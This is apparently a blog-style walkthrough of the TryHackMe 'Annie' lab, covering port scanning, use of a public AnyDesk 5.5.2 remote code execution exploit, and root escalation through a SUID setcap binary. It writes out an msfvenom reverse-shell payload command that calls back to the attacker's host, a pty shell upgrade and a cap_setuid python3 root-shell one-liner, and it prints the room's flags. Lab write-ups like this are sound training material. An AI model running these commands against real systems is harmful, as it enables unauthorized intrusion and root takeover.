Annie
Remote access comes in different flavors. Another Try Hack Me free room, this one is classified with medium difficult.
First thing I try is to see if there’s some web response. No answer after trying to reach through port 80. Okay, I would run nmap anyway.
w1zard in try-hack-me/rooms/annie
nmap -Pn -p- -oA nmap-fullports-annie 10.10.92.77
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-11 17:35 -03
Nmap scan report for 10.10.92.77
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
7070/tcp open realserver
43353/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1082.16 seconds
Right, we can run the default script scan along with the service/version detection.
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 72d72534e807b7d96fbad6981aa317db (RSA)
| 256 721026ce5c53084b6183f87ad19e9b86 (ECDSA)
|_ 256 d10e6da84e8e20ce1f0032c1448dfe4e (ED25519)
7070/tcp open ssl/realserver?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=AnyDesk Client
| Not valid before: 2022-03-23T20:04:30
|_Not valid after: 2072-03-10T20:04:30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I kinda wanted a version number, but let’s work with what we have in hand. Let me look for some exploits.
w1zard in try-hack-me/rooms/annie
searchsploit anydesk
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
AnyDesk 2.5.0 - Unquoted Service Path Privilege Escalation | windows/local/40410.txt
AnyDesk 5.4.0 - Unquoted Service Path | windows/local/47883.txt
AnyDesk 5.5.2 - Remote Code Execution | linux/remote/49613.py
----------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Going straight for the RCE.
w1zard in try-hack-me/rooms/annie
searchsploit -m 49613
Exploit: AnyDesk 5.5.2 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/49613
Path: /usr/share/exploitdb/exploits/linux/remote/49613.py
Codes: CVE-2020-13160
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/w1zard/Documents/labs/try-hack-me/rooms/annie/49613.py
A bit of inspection and, oh, great, there’s a link for a walkthough. I just have to change target IP, port and create a shellcode payload using MSVenom.
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.y.y LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
Shellcode goes into exploit, and exploit does nothing. I tried running the exploit a couple times, thought the machine was wonky and rebooted it. Executed the exploit a couple more of times, nothing. Fvck. Changed absolutely nothing, run the exploit a few more times…
connect to [10.13.3.36] from (UNKNOWN) [10.10.128.217] 45640
No logic, just repeat the same thing and maybe you’ll get a different result.
python3 -c 'import pty;pty.spawn("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
annie@desktop:/home/annie$ cat user.txt
cat user.txt
THM{N0t_Ju5t_ANY_D3sk}
Now for the privilege escalation, the way I found was through files owned by root.
find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
annie@desktop:/home/annie$ find / -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
< -perm -4000 -type f -exec ls -al {} 2>/dev/null \;
-rwsr-xr-x 1 root root 10232 Nov 16 2017 /sbin/setcap
-rwsr-xr-x 1 root root 43088 Sep 16 2020 /bin/mount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 44664 Jan 25 2022 /bin/su
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26696 Sep 16 2020 /bin/umount
-rwsr-xr-- 1 root dip 378600 Jul 23 2020 /usr/sbin/pppd
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 2 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 14328 Jan 12 2022 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root root 10232 Dec 14 2021 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 22528 Jun 28 2019 /usr/bin/arping
-rwsr-xr-x 1 root root 40344 Jan 25 2022 /usr/bin/newgrp
-rwsr-xr-x 1 root root 149080 Jan 19 2021 /usr/bin/sudo
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 76496 Jan 25 2022 /usr/bin/chfn
-rwsr-xr-x 1 root root 75824 Jan 25 2022 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jan 25 2022 /usr/bin/chsh
-rwsr-xr-x 1 root root 59640 Jan 25 2022 /usr/bin/passwd
-rwsr-xr-x 1 root root 22520 Jan 12 2022 /usr/bin/pkexec
setcap is standing off from the list. Let me have a look at this.
Okay, you can force capabilities upon programs using setcap and they can be exploited by passing them malicious commands or arguments which are then run as root. Thanks HackTricks.
annie@desktop:/home/annie$ which python3
which python3
/usr/bin/python3
annie@desktop:/home/annie$ cp /usr/bin/python3 .
cp /usr/bin/python3 .
annie@desktop:/home/annie$ /sbin/setcap cap_setuid+ep /home/annie/python3
/sbin/setcap cap_setuid+ep /home/annie/python3
annie@desktop:/home/annie$ ./python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@desktop:/home/annie# cat /root/root.txt
cat /root/root.txt
THM{0nly_th3m_5.5.2_D3sk}
